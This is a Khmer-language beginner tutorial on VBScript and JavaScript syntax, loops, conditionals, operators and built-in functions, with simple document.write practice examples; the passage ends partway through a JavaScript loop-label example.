អ្នក​ក៏​អាច​ប្រើ “ករណី​ជ្រើស​” សេចក្តី​ថ្លែង​ការណ៍​ប្រសិន​បើ​អ្នក​ចង់​ជ្រើស​មួយ​ក្នុង​ចំណោម​ជា​ច្រើន​ប្លុក​នៃ​កូដ​ដើម្បី​ប្រតិបត្តិ​:
ឧ​ទា​ហរ​ណ៏
<script type=”text/vbscript”>
d=weekday(date)
Select Case d
Case 1
document.write(“Sleepy Sunday”)
Case 2
document.write(“Monday again!”)
Case 3
document.write(“Just Tuesday!”)
Case 4
document.write(“Wednesday!”)
Case 5
document.write(“Thursday…”)
Case 6
document.write(“Finally Friday!”)
Case else
document.write(“Super Saturday!!!!”)
End Select
</script>

មេរៀន រង្វិល​ជុំ VBScript Loop

សេចក្តី​ថ្លែង​ការ​ណ៏​រង្វិល​ជុំ សេចក្តី​ថ្លែង​ការណ៍​របស់ Loop ត្រូវ​បាន​ប្រើ​ដើម្បី​រត់​ប្លុក​ដូច​គ្នា​នៃ​កូដ​មួយ​ចំនួន​ដែល​បាន​បញ្ជាក់​នៃ​ដង​។
នៅ​ក្នុង VBScript យើង​មាន​ចំនួន​បួន​រយ​រ​ណ៍​រង្វិល​ជុំ​:

-For…Next statement – រត់​លេខ​កូដ​មួយ​ចំនួន​ដែល​បាន​បញ្ជាក់​ដង
-For Each…Next statement  – រត់​កូដ​សម្រាប់​ធាតុ​គ្នា​នៅ​ក្នុង​សម្រាំង​ឬ​ធាតុ​នីមួយ​នៃ​ការ​អា​រេ​មួយ
-Do…Loop statement – រង្វិល​ជុំ​ខណៈ​ពេល​ឬ​រហូត​ទាល់​លក្ខខណ្ឌ​មួយ​គឺ​ជា​ការ​ពិត
-While…Wend statement – កុំ​ប្រើ​វា – ប្រើ​ការ​ធ្វើ​សេចក្តី​ថ្លែង​ការណ៍​រង្វិល​ជុំ​ជំនួស​វិញ …

For…Next Loop  ប្រើ For…Next statement សេចក្តី​ថ្លែងការណ៍​ដើម្បី​រត់​ប្លុក​នៃ​កូដ​មួយ​ចំនួន​ដែល​បាន​បញ្ជាក់​នៃ​ដង​។ សម្រាប់សេចក្តី​ថ្លែង​ការណ៍ statement លក្ខណ:ពិសេសសម្រាប់រាប់  variable (i),តម្លៃចាប់ផ្តើម និងបញ្ចប់  សេចក្តី​ថ្លែងការណ៍​បង្កើន​អថេរ​រាប់  variable (i)
ឧទាហរណ៍
<html>
<body>

<script type=”text/vbscript”>
For i = 0 To 5
document.write(“The number is ” & i & “<br />”)
Next
</script>

</body>
</html>
ជំហានគន្លឹះ  Step keyword, ពាក្យ​គន្លឹះ​អ្នក​អាច​បង្កើន​ឬ​បន្ថយ​អថេរ​រាប់​តាម​តម្លៃ​ដែល​អ្នក​បាន​បញ្ជាក់​។

For i=2 To 10 Step 2
some code
Next

ដើម្បី​កាត់​បន្ថយ​អថេរ​រាប់​អ្នក​ត្រូវ​តែ​ប្រើ​ជា​មួយ​អវិជ្ជមាន variable, អ្នក​ត្រូវ​តែ​បញ្ជាក់​តម្លៃ​ចុង​មួយ​ដែល​មាន​តម្លៃ​ទាប​ជាង​តម្លៃ​ពេល​ចាប់ផ្តើម​។

For i=10 To 2 Step -2
some code
Next
Exit a For…Next  អ្នក​អាច​ចេញ​សេចក្តី​ថ្លែង​ការណ៍​មួយ​សម្រាប់ … បន្ទាប់​ជាមួយ​នឹង​ចេញ​សម្រាប់​ពាក្យ​គន្លឹះ​ For keyword
For i=1 To 10
If i=5 Then Exit For
some code
Next
For Each…Next Loop loop រង្វិល​ជុំ​ធ្វើ​ឡើងវិញ​ប្លុក​នៃ​កូដ​មួយ​សម្រាប់​ធាតុ​គ្នា​នៅ​ក្នុង​សម្រាំង​មួយ​ឬ​សម្រាប់​ធាតុ​នៃ​អា​រេ​មួយ​គ្នា​។
<html>
<body>

<script type=”text/vbscript”>
Dim cars(2)
cars(0)=”Volvo”
cars(1)=”Saab”
cars(2)=”BMW”

For Each x In cars
document.write(x & “<br />”)
Next
</script>

</body>
</html>

លំហាត់អនុវត្តន៍ VBScript

លទ្ធផល Output
សរសេរ​អត្ថបទ​ដោយ​ប្រើ VBScript
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
document.write(“Hello World!”)
</script>
</body>
</html>
សរសេរ HTML ដែល​ប្រើ  VBScript
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
document.write(“<h1>Hello World!</h1>”)
</script>
</body>
</html>

អថេរ Variables
បង្កើត​អថេរ​មួយ  variable
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
Dim firstname
firstname=”Hege”
document.write(firstname)
document.write(“<br>”)
firstname=”Tove”
document.write(firstname)
</script>
<p>The script above declares a variable, assigns a value to it, and displays the value. Then, it changes the value, and displays the value again.</p>
</body>
</html>

បញ្ចូល​ជា​តម្លៃ​អថេរ​នៅ​ក្នុង​អត្ថបទ​មួយ  text
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
Dim name
name=”Jan Egil”
document.write(“My name is: ” & name)
</script>
</body>
</html>
បង្កើត​អា​រេ​មួយ array
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
Dim famname(5)
famname(0)=”Jan Egil”
famname(1)=”Tove”
famname(2)=”Hege”
famname(3)=”Stale”
famname(4)=”Kai Jim”
famname(5)=”Borge”
For i=0 To 5
document.write(famname(i) & “<br>”)
Next
</script>

</body>
</html>
Sub procedure
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
Sub mysub()
document.write(“I was written by a sub procedure”)
End Sub
document.write(“I was written by the script<br>”)
Call mysub()
</script>

</body>
</html>
អនុគមន៍ procedure
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>
<script type=”text/vbscript”>
Function myfunction()
myfunction=Date()
End Function
document.write(“Today’s date: “)
document.write(myfunction())
</script>
<p>A Function procedure can return a result.</p>
</body>
</html>

សេចក្តី​ថ្លែង​ការ​ណ៏​ដោយ​មាន​លក្ខខណ្ឌ Conditional Statements
សេចក្តី​ថ្លែង​ការ​ណ៏ If…Then..Else statement
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
i=hour(time)
If i < 10 Then
document.write(“Good morning!”)
Else
document.write(“Have a nice day!”)
End If
</script>

</body>
</html>
សេចក្តី​ថ្លែង​ការ​ណ៏ If…Then..ElseIf statement
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
i=hour(time)
If i = 10 Then
document.write(“Just started…!”)
ElseIf i = 11 Then
document.write(“Hungry!”)
ElseIf i = 12 Then
document.write(“Ah, lunch-time!”)
ElseIf i = 16 Then
document.write(“Time to go home!”)
Else
document.write(“Unknown”)
End If
</script>

</body>
</html>
ជ្រើស​ករណី​សេចក្តី​ថ្លែងការណ៍  Select Case statement
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>

<body>
<script type=”text/vbscript”>
d=weekday(Date)

Select Case d
Case 1
document.write(“Sleepy Sunday”)
Case 2
document.write(“Monday again!”)
Case 3
document.write(“Just Tuesday!”)
Case 4
document.write(“Wednesday!”)
Case 5
document.write(“Thursday…”)
Case 6
document.write(“Finally Friday!”)
Case Else
document.write(“Super Saturday!!!!”)
End Select
</script>

<p>This example demonstrates the “Select Case” statement.</p>
<p>You will receive a different greeting based on what day it is.</p>
<p>Note that Sunday=1, Monday=2, Tuesday=3, etc.</p>

</body>
</html>
តំណ​ចៃដន្យ Random link
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
randomize()
r=rnd()
If r>0.5 Then
document.write(“<a href=’http://www.w3schools.com’>Learn Web Development!</a>”)
Else
document.write(“<a href=’http://www.refsnesdata.no’>Visit Refsnes Data!</a>”)
End If
</script>

<p>
This example demonstrates a link, when you click on the link it will take you to W3Schools.com OR to
RefsnesData.no. There is a 50% chance for each of them.
</p>
</body>
</html>

អនុគមន៍ Looping

រង្វិល​ជុំ​បន្ទាប់ For..Next loop
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
For i = 0 To 5
document.write(“The number is ” & i & “<br>”)
Next
</script>

</body>
</html>
Looping តាម​រយៈ​បឋមកថា  HTML headers
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
For i=1 To 6
document.write(“<h” & i & “>This is header ” & i & “</h” & i & “>”)
Next
</script>

</body>
</html>
ចំពោះ .. រង្វិល​ជុំ​នីមួយ For..Each loop
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
Dim cars(2)
cars(0)=”Volvo”
cars(1)=”Saab”
cars(2)=”BMW”

For Each x In cars
document.write(x & “<br>”)
Next
</script>

</body>
</html>
តើ … ខណៈ​ពេល​ដែល​ការ​រង្វិល​ជុំ Do…While loop
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
i=0
Do While i < 10
document.write(i & “<br>”)
i=i+1
Loop
</script>

</body>
</html>

អនុគមន៍កាលបរិច្ឆេទ​និង​ម៉ោង Date and Time Functions
បង្ហាញ​កាលបរិច្ឆេទ​និង​ពេលវេលា  Date and Time
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
document.write(“Today’s date is ” & Date())
document.write(“<br>”)
document.write(“The time is ” & Time())
</script>

</body>
</html>
បង្ហាញ​ថ្ងៃ​ដែល  days
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<p>VBScripts’ function <b>WeekdayName</b> is used to get a weekday:</p>
<script type=”text/vbscript”>
document.write(“<p>”)
document.write(WeekDayName(1))
document.write(“<br>”)
document.write(WeekDayName(2))
document.write(“</p><p>”)

document.write(“Get the abbreviated name of a weekday:”)
document.write(“<br>”)
document.write(WeekDayName(1,True))
document.write(“<br>”)
document.write(WeekDayName(2,True))
document.write(“</p><p>”)

document.write(“Get the current weekday:”)
document.write(“<br>”)
document.write(WeekdayName(weekday(Date)))
document.write(“<br>”)
document.write(WeekdayName(weekday(Date), True))
document.write(“</p>”)
</script>

</body>
</html>

បង្ហាញ​ខែ​នា​ពេល​បច្ចុប្បន្ន​និង​ថ្ងៃ  months
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<p>VBScripts’ function <b>MonthName</b> is used to get a month:</p>
<script type=”text/vbscript”>
document.write(“<p>”)
document.write(MonthName(1))
document.write(“<br>”)
document.write(MonthName(2))
document.write(“</p><p>”)

document.write(“Here is how you get the abbreviated name of a month:”)
document.write(“<br>”)
document.write(MonthName(1,True))
document.write(“<br>”)
document.write(MonthName(2,True))
document.write(“</p><p>”)

document.write(“Here is how you get the current month:”)
document.write(“<br>”)
document.write(MonthName(Month(Date)))
document.write(“<br>”)
document.write(MonthName(Month(Date),True))
document.write(“</p>”)
</script>

</body>
</html>
ទៅ Countdown 3000 ឆ្នាំ
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<p>Countdown to year 3000:</p>

<p>
<script type=”text/vbscript”>
millennium=CDate(“1/1/3000 00:00:00”)
document.write(“It is ” & DateDiff(“yyyy”, Now(), millennium) & ” years to year 3000!<br>”)
document.write(“It is ” & DateDiff(“m”, Now(), millennium) & ” months to year 3000!<br>”)
document.write(“It is ” & DateDiff(“d”, Now(), millennium) & ” days to year 3000!<br>”)
document.write(“It is ” & DateDiff(“h”, Now(), millennium) & ” hours to year 3000!<br>”)
document.write(“It is ” & DateDiff(“n”, Now(), millennium) & ” minutes to year 3000!<br>”)
document.write(“It is ” & DateDiff(“s”, Now(), millennium) & ” seconds to year 3000!<br>”)
</script>
</p>

</body>
</html>

បន្ថែម​ចន្លោះ​ពេល​មួយ​ទៅ​មួយ​កាល​បរិច្ឆេទ
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
document.write(DateAdd(“d”,30,Date()))
</script>

<p>
This example uses <b>DateAdd</b> to calculate a date 30 days from today.
</p>
<p>
Syntax for DateAdd: DateAdd(interval,number,date).
</p>

</body>
</html>
ទ្រង់ទ្រាយ​កាលបរិច្ឆេទ​និង​ម៉ោង Format Date and Time
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
document.write(FormatDateTime(Date(),vbGeneralDate))
document.write(“<br>”)
document.write(FormatDateTime(Date(),vbLongDate))
document.write(“<br>”)
document.write(FormatDateTime(Date(),vbShortDate))
document.write(“<br>”)
document.write(FormatDateTime(Now(),vbLongTime))
document.write(“<br>”)
document.write(FormatDateTime(Now(),vbShortTime))
</script>

<p>Syntax for FormatDateTime: FormatDateTime(Date,namedformat).</p>

</body>
</html>
តើ​នេះ​ជា​កាល​បរិច្ឆេទ​ឬ​ទេ​?
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
somedate=”10/30/99″
document.write(IsDate(somedate))
</script>

</body>
</html>

អនុគមន៍សាងសង់​ក្នុង​ផ្សេងទៀត  Built-in Functions
អក្សរ​ធំ​ឬ​តួអក្សរ​តូច​ Uppercase or lowercase?
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
txt=”Have a nice day!”
document.write(UCase(txt))
document.write(“<br>”)
document.write(LCase(txt))
</script>

</body>
</html>

យក​ចេញ​ឈាន​មុខ​គេ​ឬ​ដកឃ្លា​នៅ​ពី​ក្រោយ​ចេញ​ពី​ខ្សែ​អក្សរ  string
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
fname=” Bill ”
document.write(“Hello” & Trim(fname) & “Gates<br>”)
document.write(“Hello” & RTrim(fname) & “Gates<br>”)
document.write(“Hello” & LTrim(fname) & “Gates<br>”)
</script>

</body>
</html>

បញ្ច្រាស​ខ្សែ​អក្សរ​មួយ Reverse a string
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
sometext = “Hello Everyone!”
document.write(StrReverse(sometext))
</script>

</body>
</html>
ជុំ​ទី​មួយ​ចំនួន Round a number
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
i = 48.66776677
j = 48.3333333
document.write(Round(i))
document.write(“<br>”)
document.write(Round(j))
</script>

</body>
</html>
ត្រឡប់​មួយ​ចំនួន​ចៃដន្យ Return a random number
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
Randomize()
document.write(Rnd())
</script>

</body>
</html>

ត្រឡប់​មួយ​ចំនួន​ចៃដន្យ​រវាង 0-99 random number between 0-99
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
Randomize()
randomNumber=Int(100 * Rnd())
document.write(“A random number: <b>” & randomNumber & “</b>”)
</script>

</body>
</html>

ត្រឡប់​មួយ​ចំនួន​ដែល​បាន​បញ្ជាក់​ characters from a string
កូដអនុវត្តន៍
<!DOCTYPE html>
<html>
<body>

<script type=”text/vbscript”>
sometext=”Welcome to our Web Site!!”
document.write(Mid(sometext, 9, 2))
</script>

</body>
</html>

មេរៀនសង្ខេប JavaScript

aJavaScript គឺជាអ្វី?
JavaScript ចាប់ផ្តើមប្រើ LiveScript ប៉ុន្តែបានផ្លាស់ប្តូរឈ្មោះរបស់ Netscape ដោយបានបង្កើតដោយកម្មវិធី Java អភិវឌ្ឃន៍ទៅជា JavaScript ផងដែរ។ JavaScript ដើម្បីធ្វើឱ្យរូបរាងដំបូងរបស់ខ្លួននៅលើ Netscape 2.0 នៅក្នុងឆ្នាំ 1995 ជាមួយនឹង LiveScript ។

១-  មេរៀន JavaScript Syntax
<script> ជាកម្មវិធីកម្មវិធីរុករកបណ្ដាញចាប់ផ្តើមការបកស្រាយទាំង អស់ អត្ថបទ រវាងស្លាកទាំងនេះជាមួយ ស្គ្រីប។ Syntacx សាមញ្ញដូចខាងក្រោម:

<script ...>
 JavaScript code
</script>

ដូច្នេះ JavaScript នឹងមានដូចជា:

<script language="javascript" type="text/javascript">
 JavaScript code
</script>

JavaScript Script ដំបូង
ឧទាហរណ៍ print ចេញ”Hello World”

<html>
<body>
<script language="javascript" type="text/javascript">
<!--
  document.write("Hello World!")
//-->
</script>
</body>
</html>

ប្រើ Semicolons

<script language="javascript" type="text/javascript">
<!--
 var1 = 10
 var2 = 20
//-->
</script>

But when formatted in a single line as follows, the semicolons are required:

<script language="javascript" type="text/javascript">
<!--
 var1 = 10; var2 = 20;
//-->
</script>

Comments នៅក្នុង JavaScript:
ឧទាហរណ៍

<script language="javascript" type="text/javascript">
<!--

// This is a comment. It is similar to comments in C++

/*
 * This is a multiline comment in JavaScript
 * It is very similar to comments in C Programming
 */
//-->
</script>

២-  មេរៀន  JavaScript ក្នុង Browsers

JavaScript in Internet Explorer: Here are simple steps to turn on or turn off JavaScript in your Internet Explorer:

 1. Follow Tools-> Internet Options from the menu
 2. Select Security tab from the dialog box
 3. Click the Custom Level button
 4. Scroll down till you find Scripting option
 5. Select Enable radio button under Active scripting
 6. Finally click OK and come out

JavaScript in Firefox: Here are simple steps to turn on or turn off JavaScript in your Firefox:

 1. Follow Tools-> Optionsfrom the menu
 2. Select Content option from the dialog box
 3. Select Enable JavaScript checkbox
 4. Finally click OK and come out

JavaScript in Opera: Here are simple steps to turn on or turn off JavaScript in your Opera:

 1. Follow Tools-> Preferencesfrom the menu
 2. Select Advanced option from the dialog box
 3. Select Content from the listed items
 4. Select Enable JavaScript checkbox
 5. Finally click OK and come out

Non-JavaScript Browsers:

<html>
<body>

<script language="javascript" type="text/javascript">
<!--
  document.write("Hello World!")
//-->
</script>

<noscript>
 Sorry...JavaScript is needed to go ahead.
</noscript>
</body>
</html>

៣  – មេរៀន  JavaScript នៅក្នុង HTML File

 • Script in <head>…</head> section.
 • Script in <body>…</body> section.
 • Script in <body>…</body> and <head>…</head> sections.
 • Script in and external file and then include in <head>…</head> section.

JavaScript in <head>…</head> section:

<html>
<head>
<script type="text/javascript">
<!--
function sayHello() {
  alert("Hello World")
}
//-->
</script>
</head>
<body>
<input type="button" onclick="sayHello()" value="Say Hello" />
</body>
</html>

JavaScript in <body>…</body> section:

<html>
<head>
</head>
<body>
<script type="text/javascript">
<!--
document.write("Hello World")
//-->
</script>
<p>This is web page body </p>
</body>
</html>

លទ្ធផលចេញជា

Advertisements
Hello World
This is web page body

JavaScript in <body> and <head> sections:

You can put your JavaScript code in <head> and <body> section altogether as follows:

<html>
<head>
<script type="text/javascript">
<!--
function sayHello() {
  alert("Hello World")
}
//-->
</script>
</head>
<body>
<script type="text/javascript">
<!--
document.write("Hello World")
//-->
</script>
<input type="button" onclick="sayHello()" value="Say Hello" />
</body>
</html>

លទ្ធផលចេញជា

aJavaScript in External File :
example to show how you can include an external JavaScript file in your HTML code using script tag and its src attribute:

<html>
<head>
<script type="text/javascript" src="filename.js" ></script>
</head>
<body>
.......
</body>
</html>

៤-  មេរៀន JavaScript  អេថេរ និងប្រភេទទិន្នន័យ  Data Types
JavaScript អនុញ្ញាតលោកអ្នកធ្វើការជាមួយប្រភេទ  data types:

 • Numbers ឧ 123, 120.50 etc.
 • Strings of text ឧ “This text string” etc.
 • Boolean ឧ true ឬ false

JavaScript អេថេរ Variables:

<script type="text/javascript">
<!--
var money;
var name;
//-->
</script>
You can also declare multiple variables with the same var keyword as follows:
<script type="text/javascript">
<!--
var money, name;
//-->
</script>

JavaScript Variable Scope:

<script type="text/javascript">
<!--
var myVar = "global"; // Declare a global variable
function checkscope( ) {
  var myVar = "local"; // Declare a local variable
  document.write(myVar);
}
//-->
</script>

JavaScript Variable Names:
JavaScript Reserved Words:

stract
boolean
break
byte
case
catch
char
class
const
continue
debugger
default
delete
do
double
else
enum
export
extends
false
final
finally
float
for
function
goto
if
implements
import
in
instanceof
int
interface
long
native
new
null
package
private
protected
public
return
short
static
super
switch
synchronized
this
throw
throws
transient
true
try
typeof
var
void
volatile
while
with

៥-   មេរៀន ប្រមាណវិធី JavaScript Operators

–  ប្រមាណវិធី លេខ Arithmetic Operators
–   ប្រមាណវិធី ធៀប Comparision Operators
–   ប្រមាណវិធី Logical (or Relational) Operators
–   ប្រមាណវិធី Assignment Operators
–  ប្រមាណវិធី លក្ខខ័ណ្ឌ Conditional OperatorsThe Arithmatic Operators:

ប្រមាណវិធី ការអធិប្បាយ ឧទាហរណ៍
+ Adds two operands A + B will give 30
Subtracts second operand from the first A – B will give -10
* Multiply both operands A * B will give 200
/ Divide numerator by denumerator B / A will give 2
% Modulus Operator and remainder of after an integer division B % A will give 0
++ Increment operator, increases integer value by one A++ will give 11
Decrement operator, decreases integer value by one A– will give 9

ប្រមាណវិធី Comparison Operators:

ប្រមាណវិធី ការអធិប្បាយ ឧទាហរណ៍
== Checks if the value of two operands are equal or not, if yes then condition becomes true. (A == B) is not true.
!= Checks if the value of two operands are equal or not, if values are not equal then condition becomes true. (A != B) is true.
> Checks if the value of left operand is greater than the value of right operand, if yes then condition becomes true. (A > B) is not true.
< Checks if the value of left operand is less than the value of right operand, if yes then condition becomes true. (A < B) is true.
>= Checks if the value of left operand is greater than or equal to the value of right operand, if yes then condition becomes true. (A >= B) is not true.
<= Checks if the value of left operand is less than or equal to the value of right operand, if yes then condition becomes true. (A <= B) is true.

ប្រមាណវិធី Logical Operators:

ប្រមាណវិធី ការអធិប្បាយ ឧទាហរណ៍
&& Called Logical AND operator. If both the operands are non zero then then condition becomes true. (A && B) is true.
|| Called Logical OR Operator. If any of the two operands are non zero then then condition becomes true. (A || B) is true.
! Called Logical NOT Operator. Use to reverses the logical state of its operand. If a condition is true then Logical NOT operator will make false. !(A && B) is false

ប្រមាណវិធី Assignment Operators:

ប្រមាណវិធី ការអធិប្បាយ ឧទាហរណ៍
= Simple assignment operator, Assigns values from right side operands to left side operand C = A + B will assigne value of A + B into C
+= Add AND assignment operator, It adds right operand to the left operand and assign the result to left operand C += A is equivalent to C = C + A
-= Subtract AND assignment operator, It subtracts right operand from the left operand and assign the result to left operand C -= A is equivalent to C = C – A
*= Multiply AND assignment operator, It multiplies right operand with the left operand and assign the result to left operand C *= A is equivalent to C = C * A
/= Divide AND assignment operator, It divides left operand with the right operand and assign the result to left operand C /= A is equivalent to C = C / A
%= Modulus AND assignment operator, It takes modulus using two operands and assign the result to left operand C %= A is equivalent to C = C % A

ប្រមាណវិធី Conditional Operator (? 🙂

ប្រមាណវិធី ការអធិប្បាយ ឧទាហរណ៍
? : Conditional Expression If Condition is true ? Then value X : Otherwise value Y

The typeof Operator

ប្រភេទ String Returned by typeof
Number “number”
String “string”
Boolean “boolean”
Object “object”
Function “function”
Undefined “undefined”
Null “object”

៦-  មេរៀន ការប្រកាស JavaScript if…else Statements
JavaScript ផ្គត់ផ្គង់ទម្រង់ការប្រកាស if..else statement:

 • if statement
 • if…else statement
 • if…else if… statement.

ការប្រកាស if :
Syntax:

if (expression){
  Statement(s) to be executed if expression is true
}
ឧទាហរណ៍
<script type="text/javascript">
<!--
var age = 20;
if( age > 18 ){
  document.write("<b>Qualifies for driving</b>");
}
//-->
</script>

លទ្ធផលចេញ:   Qualifies for driving

ការប្រកាស if…else statement:
Syntax:

if (expression){
  Statement(s) to be executed if expression is true
}else{
  Statement(s) to be executed if expression is false
}

ឧទាហរណ៍

<script type="text/javascript">
<!--
var age = 15;
if( age > 18 ){
  document.write("<b>Qualifies for driving</b>");
}else{
  document.write("<b>Does not qualify for driving</b>");
}
//-->
</script>

លទ្ធផលចេញ:  Does not qualify for driving

ការប្រកាស if…else if… statement:
Syntax:

if (expression 1){
  Statement(s) to be executed if expression 1 is true
}else if (expression 2){
  Statement(s) to be executed if expression 2 is true
}else if (expression 3){
  Statement(s) to be executed if expression 3 is true
}else{
  Statement(s) to be executed if no expression is true
}

ឧទាហរណ៍

<script type="text/javascript">
<!--
var book = "maths";
if( book == "history" ){
  document.write("<b>History Book</b>");
}else if( book == "maths" ){
  document.write("<b>Maths Book</b>");
}else if( book == "economics" ){
  document.write("<b>Economics Book</b>");
}else{
 document.write("<b>Unknown Book</b>");
}
//-->
</script>

លទ្ធផលចេញ:  Maths Book

៧-  មេរៀន  JavaScript Switch Case
Syntax

switch (expression)
{
 case condition 1: statement(s)
          break;
 case condition 2: statement(s)
          break;
  ...
 case condition n: statement(s)
          break;
 default: statement(s)
}

ឧទាហរណ៍បង្ហាញពី loop

<script type="text/javascript">
<!--
var grade='A';
document.write("Entering switch block<br />");
switch (grade)
{
 case 'A': document.write("Good job<br />");
      break;
 case 'B': document.write("Pretty good<br />");
      break;
 case 'C': document.write("Passed<br />");
      break;
 case 'D': document.write("Not so good<br />");
      break;
 case 'F': document.write("Failed<br />");
      break;
 default: document.write("Unknown grade<br />")
}
document.write("Exiting switch block");
//-->
</script>

លទ្ធផលចេញ

Entering switch block
Good job
Exiting switch block

ឧទាហរណ៍ ករណីប្រើ if ដោយមិនប្រើ break statement:

<script type="text/javascript">
<!--
var grade='A';
document.write("Entering switch block<br />");
switch (grade)
{
 case 'A': document.write("Good job<br />");
 case 'B': document.write("Pretty good<br />");
 case 'C': document.write("Passed<br />");
 case 'D': document.write("Not so good<br />");
 case 'F': document.write("Failed<br />");
 default: document.write("Unknown grade<br />")
}
document.write("Exiting switch block");
//-->
</script>

លទ្ធផលចេញ: 

Entering switch block
Good job
Pretty good
Passed
Not so good
Failed
Unknown grade
Exiting switch block

៨-  មេរៀន  JavaScript while Loops
The while Loop

Syntax

while (expression){
  Statement(s) to be executed if expression is true
}

ឧទាហរណ៍ មូលដ្ឋាននៃ while loop:

<script type="text/javascript">
<!--
var count = 0;
document.write("Starting Loop" + "<br />");
while (count < 10){
 document.write("Current Count : " + count + "<br />");
 count++;
}
document.write("Loop stopped!");
//-->
</script>

លទ្ធផលចេញ

Starting Loop
Current Count : 0
Current Count : 1
Current Count : 2
Current Count : 3
Current Count : 4
Current Count : 5
Current Count : 6
Current Count : 7
Current Count : 8
Current Count : 9
Loop stopped!

The do…while Loop:
Syntax:

do{
  Statement(s) to be executed;
} while (expression);

ឧទាហរណ៍ប្រើ do…while loop.

<script type="text/javascript">
<!--
var count = 0;
document.write("Starting Loop" + "<br />");
do{
 document.write("Current Count : " + count + "<br />");
 count++;
}while (count < 0);
document.write("Loop stopped!");
//-->
</script>

លទ្ធផលចេញ

Starting Loop
Current Count : 0
Loop stopped!

៩-  មេរៀន  JavaScript for Loops
The for Loop

Syntax

for (initialization; test condition; iteration statement){
   Statement(s) to be executed if test condition is true
}

ឧទាហរណ៍មូលដ្ឋាននៃការប្រើ for loop:

<script type="text/javascript">
<!--
var count;
document.write("Starting Loop" + "<br />");
for(count = 0; count < 10; count++){
 document.write("Current Count : " + count );
 document.write("<br />");
}
document.write("Loop stopped!");
//-->
</script>

លទ្ធផលប្រហាក់ប្រហែល និង while loop:

Starting Loop
Current Count : 0
Current Count : 1
Current Count : 2
Current Count : 3
Current Count : 4
Current Count : 5
Current Count : 6
Current Count : 7
Current Count : 8
Current Count : 9
Loop stopped!

១០-  មេរៀន  JavaScript for…in loop
Syntax

for (variablename in object){
 statement or block to execute
}

ឧទាហរណ៍

<script type="text/javascript">
<!--
var aProperty;
document.write("Navigator Object Properties<br /> ");
for (aProperty in navigator)
{
 document.write(aProperty);
 document.write("<br />");
}
document.write("Exiting from the loop!");
//-->
</script>

លទ្ធផលបង្ហាញ

Navigator Object Properties
appCodeName
appName
appMinorVersion
cpuClass
platform
plugins
opsProfile
userProfile
systemLanguage
userLanguage
appVersion
userAgent
onLine
cookieEnabled
mimeTypes
Exiting from the loop!

១១-   មេរៀន  JavaScript Loop Control
The break Statement:

ឧទាហរណ៍

<script type="text/javascript">
<!--
var x = 1;
document.write("Entering the loop<br /> ");
while (x < 20)
{
 if (x == 5){ 
   break; // breaks out of loop completely
 }
 x = x + 1;
 document.write( x + "<br />");
}
document.write("Exiting the loop!<br /> ");
//-->
</script>

លទ្ធផលបង្ហាញ

Entering the loop
2
3
4
5
Exiting the loop!

The continue Statement:
ឧទាហរណ៍

<script type="text/javascript">
<!--
var x = 1;
document.write("Entering the loop<br /> ");
while (x < 10)
{
 x = x + 1;
 if (x == 5){ 
   continue; // skill rest of the loop body
 }
 document.write( x + "<br />");
}
document.write("Exiting the loop!<br /> ");
//-->
</script>

លទ្ធផលបង្ហាញ

Entering the loop
2
3
4
6
7
8
9
10
Exiting the loop!

ការប្រើប្រាស់ពី Labels ទៅ Control :
ឧទាហរណ៍

<script type="text/javascript">
<!--
document.write("Entering the loop!<br /> ");
outerloop:  // This is the label name
for (var i = 0; i < 5; i++)
{
 document.write("Outerloop: " + i + "<br />");
 innerloop:
 for (var j = 0; j < 5; j++)
 {
   if (j > 3 ) break ;     // Quit the innermost loop
   if (i == 2) break innerloop; // Do the same thing
   if (i == 4) break outerloop; // Quit the outer loop
   document.write("Innerloop: " + j + " <br />");
  }
}
document.write("Exiting the loop!<br /> ");
//-->
</script>

លទ្ធផលបង្ហាញ

Entering the loop!
Outerloop: 0
Innerloop: 0 
Innerloop: 1 
Innerloop: 2 
Innerloop: 3 
Outerloop: 1
Innerloop: 0 
Innerloop: 1 
Innerloop: 2 
Innerloop: 3 
Outerloop: 2
Outerloop: 3
Innerloop: 0 
Innerloop: 1 
Innerloop: 2 
Innerloop: 3 
Outerloop: 4
Exiting the loop!

ឧទាហរណ៍

<script type="text/javascript">
<!--
document.write("Entering the loop!<br /> ");
outerloop:  // This is the label name
for (var i = 0; i < 3; i++)
{
